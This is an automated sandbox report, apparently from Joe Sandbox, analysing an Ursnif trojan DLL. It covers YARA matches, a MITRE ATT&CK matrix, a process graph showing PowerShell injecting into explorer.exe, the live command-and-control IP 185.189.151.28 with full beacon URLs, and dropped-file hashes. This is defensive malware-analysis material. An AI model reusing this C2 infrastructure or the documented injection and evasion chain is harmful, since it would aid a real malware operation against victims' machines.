                      Source: Yara matchFile source: 00000003.00000003.394820050.00000000051C9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.501779377.0000000004ECF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.501664627.0000000004CB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.500530669.0000000004B99000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

                      Remote Access Functionality

                      barindex
                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000003.00000003.349012704.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.448354217.00000000060D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.348921870.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.348876810.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.349079600.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.393934520.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.395608793.000000000504C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000003.453774507.0000027B6DC1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.349095553.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.348687637.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.348979060.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.394913603.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.348760397.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6240, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3172, type: MEMORYSTR
                      Source: Yara matchFile source: 3.2.rundll32.exe.4c70000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.4b994a0.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.4b994a0.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.51c94a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.51f6b40.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.514a4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.51c94a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.51f6b40.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.514a4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000003.394753510.000000000514A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.394820050.00000000051C9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.501779377.0000000004ECF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.501664627.0000000004CB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.500530669.0000000004B99000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      1
                      Valid Accounts                      		1
                      Windows Management Instrumentation                      		1
                      Valid Accounts                      		1
                      Valid Accounts                      		1
                      Obfuscated Files or Information                      		OS Credential Dumping1
                      System Time Discovery                      		Remote Services11
                      Archive Collected Data                      		Exfiltration Over Other Network Medium2
                      Ingress Tool Transfer                      		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                      Data Encrypted for Impact
                      Default Accounts2
                      Native API                      		Boot or Logon Initialization Scripts1
                      Access Token Manipulation                      		1
                      File Deletion                      		LSASS Memory1
                      Account Discovery                      		Remote Desktop Protocol1
                      Email Collection                      		Exfiltration Over Bluetooth2
                      Encrypted Channel                      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain Accounts1
                      Command and Scripting Interpreter                      		Logon Script (Windows)413
                      Process Injection                      		1
                      Masquerading                      		Security Account Manager3
                      File and Directory Discovery                      		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
                      Non-Application Layer Protocol                      		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                      Valid Accounts                      		NTDS25
                      System Information Discovery                      		Distributed Component Object ModelInput CaptureScheduled Transfer11
                      Application Layer Protocol                      		SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                      Access Token Manipulation                      		LSA Secrets11
                      Security Software Discovery                      		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.common31
                      Virtualization/Sandbox Evasion                      		Cached Domain Credentials31
                      Virtualization/Sandbox Evasion                      		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup Items413
                      Process Injection                      		DCSync3
                      Process Discovery                      		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                      Rundll32                      		Proc Filesystem1
                      Application Window Discovery                      		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
                      System Owner/User Discovery                      		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork Sniffing11
                      Remote System Discovery                      		Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                      Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput Capture1
                      System Network Configuration Discovery                      		Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 620156 Sample: rXN8OIpbzz Startdate: 04/05/2022 Architecture: WINDOWS Score: 100 52 Snort IDS alert for network traffic 2->52 54 Found malware configuration 2->54 56 Multi AV Scanner detection for submitted file 2->56 58 2 other signatures 2->58 9 mshta.exe 19 2->9         started        11 loaddll32.exe 1 2->11         started        process3 process4 13 powershell.exe 31 9->13         started        16 cmd.exe 1 11->16         started        signatures5 68 Injects code into the Windows Explorer (explorer.exe) 13->68 70 Writes to foreign memory regions 13->70 72 Creates a thread in another existing process (thread injection) 13->72 18 explorer.exe 13->18 injected 21 csc.exe 3 13->21         started        24 csc.exe 3 13->24         started        26 conhost.exe 13->26         started        28 rundll32.exe 1 6 16->28         started        process6 dnsIp7 60 Self deletion via cmd delete 18->60 31 cmd.exe 1 18->31         started        46 C:\Users\user\AppData\Local\...\nthaltvx.dll, PE32 21->46 dropped 34 cvtres.exe 1 21->34         started        48 C:\Users\user\AppData\Local\...\zn133k50.dll, PE32 24->48 dropped 36 cvtres.exe 1 24->36         started        50 185.189.151.28, 49820, 80 AS-SOFTPLUSCH Switzerland 28->50 62 System process connects to network (likely due to code injection or exploit) 28->62 64 Writes to foreign memory regions 28->64 66 Writes registry values via WMI 28->66 38 control.exe 1 28->38         started        file8 signatures9 process10 signatures11 74 Uses ping.exe to sleep 31->74 76 Uses ping.exe to check the status of other devices and networks 31->76 40 conhost.exe 31->40         started        42 PING.EXE 1 31->42         started        44 rundll32.exe 38->44         started        process12

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      rXN8OIpbzz.dll40%ReversingLabsWin32.Trojan.Jaik
                      rXN8OIpbzz.dll100%Joe Sandbox ML

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      3.2.rundll32.exe.4c70000.0.unpack100%AviraHEUR/AGEN.1245293Download File

                      Domains

                      SourceDetectionScannerLabelLink
                      l-0007.l-dc-msedge.net0%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      http://185.189.151.28/0%VirustotalBrowse
                      http://185.189.151.28/0%Avira URL Cloudsafe
                      http://https://file://USER.ID%lu.exe/upd0%Avira URL Cloudsafe
                      http://185.189.151.28/drew/21j59p5h/aMY7pIvB814fHQzA54TmstP/6F84QjrY8T/SpaWCfEUD_2FnWXvC/rEqVxZeDiGm0%Avira URL Cloudsafe
                      http://schemas.mi0%URL Reputationsafe
                      http://185.189.151.28/drew/SE7WZ12eEzLDbcY/ReHD9U37IHMRdNMyX0/f61fYgNDH/xkc3DHorIjF18_2BtcDI/NMTbVOf0%Avira URL Cloudsafe
                      http://185.189.151.28/drew/cVbBCVAVC_2BrfCTTliq4D/TR89j_2FDMhBC/Rx3lDg61/HvgZB2J7R7VD_2FxHgth09P/H_20%Avira URL Cloudsafe
                      http://185.189.151.28/drew/cVbBCVAVC_2BrfCTTliq4D/TR89j_2FDMhBC/Rx3lDg61/HvgZB2J7R7VD_2FxHgth09P/H_2Fp_2B0K/lT2QuoqZm8BQycZwQ/H4nFd1cHmG_2/B8ivI_2F0O9/bJq8uYFSa5v9Ij/oSxEbcCz5_2FkNItSz7M7/RsUqbQcn0xtbFLfk/s_2BoKVrnDqJChc/UQqpJa6I6sYnVdkvyr/aVGGIz6zI/ZEQtOcGy53_2B5iYxze_/2BYqRtgImRp7tBA6q9P/SewC3o45SwnJ_2BNfdtGRr/1q9JxgDBH/3.jlk0%Avira URL Cloudsafe
                      http://185.189.151.28/drew/SE7WZ12eEzLDbcY/ReHD9U37IHMRdNMyX0/f61fYgNDH/xkc3DHorIjF18_2BtcDI/NMTbVOfmJtH6P_2FDxg/fYP24ZJpA_2BXAD0LiynfR/sY7KfedmKK4eh/fSjWb6Xu/fAf6iEN7Rblzydam2OSbiSx/Vw6Cb_2Bbg/Vc9aYir_2By_2BYAt/7uRRpr7mVOmx/v_2F66pvHXt/nmtBefhmAX5DJk/ied6XVEApSsG8HlMS4KeZ/kP7pKEMCKNfzyZum/QUL8CnndyLC0Xcl/NmgSkYn.jlk0%Avira URL Cloudsafe
                      http://constitution.org/usdeclar.txt0%URL Reputationsafe
                      http://schemas.micr0%URL Reputationsafe
                      http://185.189.151.28/drew/21j59p5h/aMY7pIvB814fHQzA54TmstP/6F84QjrY8T/SpaWCfEUD_2FnWXvC/rEqVxZeDiGmB/EVC7r5ALKWg/9SLUGnIzpxcWYM/xuMBfgGVcmtRuQEdnu_2F/z6aCj8Veiw_2FLpI/klXzvSCm2R4EgNj/tX1BLPzJEB4fd6nZGQ/ASaXUuL8G/Cb1hq1kHRkSzUSxa9avd/CLUWUoeV5nKWyDrb3Sa/Aw0B4o70zU_2B7Hjx9TwWi/5WU7_2FRUtVgO/Qd4d0Z1_2Bvo/b7ociWkm.jlk0%Avira URL Cloudsafe
                      http://constitution.org/usdeclar.txtC:0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      l-0007.l-dc-msedge.net
                      		13.107.43.16
                      		truetrueunknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://185.189.151.28/drew/cVbBCVAVC_2BrfCTTliq4D/TR89j_2FDMhBC/Rx3lDg61/HvgZB2J7R7VD_2FxHgth09P/H_2Fp_2B0K/lT2QuoqZm8BQycZwQ/H4nFd1cHmG_2/B8ivI_2F0O9/bJq8uYFSa5v9Ij/oSxEbcCz5_2FkNItSz7M7/RsUqbQcn0xtbFLfk/s_2BoKVrnDqJChc/UQqpJa6I6sYnVdkvyr/aVGGIz6zI/ZEQtOcGy53_2B5iYxze_/2BYqRtgImRp7tBA6q9P/SewC3o45SwnJ_2BNfdtGRr/1q9JxgDBH/3.jlktrue
                      • Avira URL Cloud: safe
                      		unknown
                      http://185.189.151.28/drew/SE7WZ12eEzLDbcY/ReHD9U37IHMRdNMyX0/f61fYgNDH/xkc3DHorIjF18_2BtcDI/NMTbVOfmJtH6P_2FDxg/fYP24ZJpA_2BXAD0LiynfR/sY7KfedmKK4eh/fSjWb6Xu/fAf6iEN7Rblzydam2OSbiSx/Vw6Cb_2Bbg/Vc9aYir_2By_2BYAt/7uRRpr7mVOmx/v_2F66pvHXt/nmtBefhmAX5DJk/ied6XVEApSsG8HlMS4KeZ/kP7pKEMCKNfzyZum/QUL8CnndyLC0Xcl/NmgSkYn.jlktrue
                      • Avira URL Cloud: safe
                      		unknown
                      http://185.189.151.28/drew/21j59p5h/aMY7pIvB814fHQzA54TmstP/6F84QjrY8T/SpaWCfEUD_2FnWXvC/rEqVxZeDiGmB/EVC7r5ALKWg/9SLUGnIzpxcWYM/xuMBfgGVcmtRuQEdnu_2F/z6aCj8Veiw_2FLpI/klXzvSCm2R4EgNj/tX1BLPzJEB4fd6nZGQ/ASaXUuL8G/Cb1hq1kHRkSzUSxa9avd/CLUWUoeV5nKWyDrb3Sa/Aw0B4o70zU_2B7Hjx9TwWi/5WU7_2FRUtVgO/Qd4d0Z1_2Bvo/b7ociWkm.jlktrue
                      • Avira URL Cloud: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://185.189.151.28/rundll32.exe, 00000003.00000003.393829384.0000000002E21000.00000004.00000020.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      http://https://file://USER.ID%lu.exe/updrundll32.exe, 00000003.00000003.448354217.00000000060D8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000003.453774507.0000027B6DC1C000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		low
                      http://185.189.151.28/drew/21j59p5h/aMY7pIvB814fHQzA54TmstP/6F84QjrY8T/SpaWCfEUD_2FnWXvC/rEqVxZeDiGmrundll32.exe, 00000003.00000002.501364119.0000000002E13000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://schemas.miexplorer.exe, 00000019.00000000.606043556.000000000D9F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000019.00000000.491143563.000000000D9F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000019.00000000.471987520.000000000D9F0000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://185.189.151.28/drew/SE7WZ12eEzLDbcY/ReHD9U37IHMRdNMyX0/f61fYgNDH/xkc3DHorIjF18_2BtcDI/NMTbVOfrundll32.exe, 00000003.00000002.501297168.0000000002DBA000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://185.189.151.28/drew/cVbBCVAVC_2BrfCTTliq4D/TR89j_2FDMhBC/Rx3lDg61/HvgZB2J7R7VD_2FxHgth09P/H_2rundll32.exe, 00000003.00000003.403377940.0000000002E03000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.393803385.0000000002E13000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.501297168.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.403395449.0000000002E13000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.501364119.0000000002E13000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.393793161.0000000002E03000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://constitution.org/usdeclar.txtrundll32.exe, 00000003.00000003.448354217.00000000060D8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000003.453774507.0000027B6DC1C000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://schemas.micrexplorer.exe, 00000019.00000000.606043556.000000000D9F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000019.00000000.491143563.000000000D9F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000019.00000000.471987520.000000000D9F0000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://constitution.org/usdeclar.txtC:rundll32.exe, 00000003.00000003.448354217.00000000060D8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000003.453774507.0000027B6DC1C000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      185.189.151.28
                      		unknownSwitzerland
                      		51395AS-SOFTPLUSCHtrue

                      General Information

                      Joe Sandbox Version:34.0.0 Boulder Opal
                      Analysis ID:620156
                      Start date and time: 04/05/202212:40:412022-05-04 12:40:41 +02:00
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 12m 9s
                      Hypervisor based Inspection enabled:false
                      Report type:light
                      Sample file name:rXN8OIpbzz (renamed file extension from none to dll)
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                      Number of analysed new started processes analysed:30
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:1
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal100.troj.evad.winDLL@26/15@0/1
                      EGA Information:
                      • Successful, ratio: 50%
                      HDC Information:
                      • Successful, ratio: 19.8% (good quality ratio 18.9%)
                      • Quality average: 82.1%
                      • Quality standard deviation: 27.1%
                      HCA Information:
                      • Successful, ratio: 99%
                      • Number of executed functions: 0
                      • Number of non-executed functions: 0
                      Cookbook Comments:
                      • Adjust boot time
                      • Enable AMSI
                      • Override analysis time to 240s for rundll32

                      Warnings

                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                      • TCP Packets have been reduced to 100
                      • Excluded IPs from analysis (whitelisted): 13.107.43.16
                      • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, config.edge.skype.com.trafficmanager.net, ctldl.windowsupdate.com, arc.msn.com, ris.api.iris.microsoft.com, login.live.com, l-0007.config.skype.com, config-edge-skype.l-0007.l-msedge.net, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, query.prod.cms.rt.microsoft.com, config.edge.skype.com
                      • Execution Graph export aborted for target mshta.exe, PID 5240 because there are no executed function
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Report size getting too big, too many NtReadVirtualMemory calls found.

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      12:42:13API Interceptor1x Sleep call for process: rundll32.exe modified
                      12:43:02API Interceptor38x Sleep call for process: powershell.exe modified

                      Joe Sandbox View / Context

                      IPs

                      No context

                      Domains

                      No context

                      ASNs

                      No context

                      JA3 Fingerprints

                      No context

                      Dropped Files

                      No context

                      Created / dropped Files

                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:modified
                      Size (bytes):11606
                      Entropy (8bit):4.883977562702998
                      Encrypted:false
                      SSDEEP:192:h9smd3YrKkGdcU6CkVsm5emla9sm5ib4q4dVsm5emdjxoeRjp5Kib4nVFn3eGOVo:ySib4q4dvEib4nVoGIpN6KQkj2frkjhQ
                      MD5:243581397F734487BD471C04FB57EA44
                      SHA1:38CB3BAC7CDC67CB3B246B32117C2C6188243E77
                      SHA-256:7EA86BC5C164A1B76E3893A6C1906B66A1785F366E092F51B1791EC0CC2AAC90
                      SHA-512:1B0B1CD588E5621F63C4AACC8FF4C111AD9148D4BABE65965EC38EBD10D559A0DFB9B610CA3DF1E1DD7B1842B3E391D6804A3787B6CD00D527A660F444C4183A
                      Malicious:false
                      Preview:PSMODULECACHE.....7.t8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psm1........SafeGetCommand........Get-ScriptBlockScope....$...Get-DictionaryValueFromFirstKeyFound........New-PesterOption........Invoke-Pester........ResolveTestScripts........Set-ScriptBlockScope.........w.e...a...C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Unregister-PackageSource........Save-Package........Install-PackageProvider........Find-PackageProvider........Install-Package........Get-PackageProvider........Get-Package........Uninstall-Package........Set-PackageSource........Get-PackageSource........Find-Package........Register-PackageSource........Import-PackageProvider...........e...[...C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Set-PackageSource........Unregister-PackageSource........Get-PackageSource........Install-Package........Save-Package........Get-Package...

                      C:\Users\user\AppData\Local\Temp\CSC41D8DEC26D8340F3B72514D252AF5890.TMP

                      Download File
                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                      File Type:MSVC .res
                      Category:dropped
                      Size (bytes):652
                      Entropy (8bit):3.117340628214124
                      Encrypted:false
                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryuRwak7YnqqbR1PN5Dlq5J:+RI+ycuZhNACakSbDPNnqX
                      MD5:571B3CB43AB7A3A962B41BE2274F3521
                      SHA1:4DE5F7697BC4B839317DB5F169FF23DE442E94AA
                      SHA-256:7FEEEFAEF26874370125E0097C4A4F8EBA03F7E8C44D495A11B2E93830D3257B
                      SHA-512:59A1D85FEB48925C88AC4AF9CD442FE99E4B5D9B9A24E6782D7ECE34C534F4D94E4ED4F76433A808550933232CEFCFE08134CEDBA6819DDFB5012C6F45F0E61D
                      Malicious:false
                      Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...z.n.1.3.3.k.5.0...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...z.n.1.3.3.k.5.0...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                      C:\Users\user\AppData\Local\Temp\CSCFB39A903173B4FAEAF71F3E48EC5D0FF.TMP

                      Download File
                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                      File Type:MSVC .res
                      Category:dropped
                      Size (bytes):652
                      Entropy (8bit):3.0886415917501604
                      Encrypted:false
                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grysCak7YnqqdDPN5Dlq5J:+RI+ycuZhN/akSBPNnqX
                      MD5:AC9F318528C2E9980E0B55A1D3C46D05
                      SHA1:625826A7F50E78F6F5C8816617D54AC291BA9BCB
                      SHA-256:0B4A74B985C030E7F1209E392C387C5BA3159177DFA6F75E94834871ABDD1345
                      SHA-512:89B4D40E8CD270571BFEB0791208328528983A4DA335259EB4898B3A185D1FCA8EF5D5844E3FE4B97685817C87A6F4E9782C972A529A7E30BA1AD105C2950848
                      Malicious:false
                      Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...n.t.h.a.l.t.v.x...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...n.t.h.a.l.t.v.x...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                      C:\Users\user\AppData\Local\Temp\RES3047.tmp

                      Download File
                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x482, 9 symbols
                      Category:dropped
                      Size (bytes):1320
                      Entropy (8bit):3.9726189415617856
                      Encrypted:false
                      SSDEEP:24:HPjnW9rVwnpZhHkYhKdNWI+ycuZhN/akSBPNnq9hgd:DWOnpLdKd41ul/a3zq9y
                      MD5:B57E06AF09269FE68011CA9C7263B9C1
                      SHA1:22145379CCA3CE319C692CA90651DAB2B853A773
                      SHA-256:2E51AD976DB23F78659A5886FE4F6D1CC8AEBF49C0947EDE2766F06AD8D84793
                      SHA-512:D9677EF1E6433C51795690D2CC93380D1030464A1C46C1468F510594978659D97ECA79C5F9D38C95147F71EB31D8147C4DEF8CC783465BBFD2F6E11750D78B80
                      Malicious:false
                      Preview:L...L.rb.............debug$S........D...................@..B.rsrc$01........X.......(...........@..@.rsrc$02........P...2...............@..@........K....c:\Users\user\AppData\Local\Temp\CSCFB39A903173B4FAEAF71F3E48EC5D0FF.TMP..................1.(....U...m...........4.......C:\Users\user\AppData\Local\Temp\RES3047.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...n.t.h.a.l.t.v.x...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.

                      C:\Users\user\AppData\Local\Temp\RES4508.tmp

                      Download File
                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x482, 9 symbols
                      Category:dropped
                      Size (bytes):1320
                      Entropy (8bit):3.9737871135359653
                      Encrypted:false
                      SSDEEP:24:HeijnW9rnzfCXhH+hKdNWI+ycuZhNACakSbDPNnq9hgd:+qWnzfm0Kd41ulZa3Vq9y
                      MD5:4A1D627423CCEA7DAE9A6D6F5E440B1E
                      SHA1:AA8EAAAB1D76DBD9DF4BB89A99D498A4326BCD1F
                      SHA-256:D853265DC40AA9B37D5E3C5B703BFEE954FA42A1FCB7BC90BAA0B4F249C4A8D3
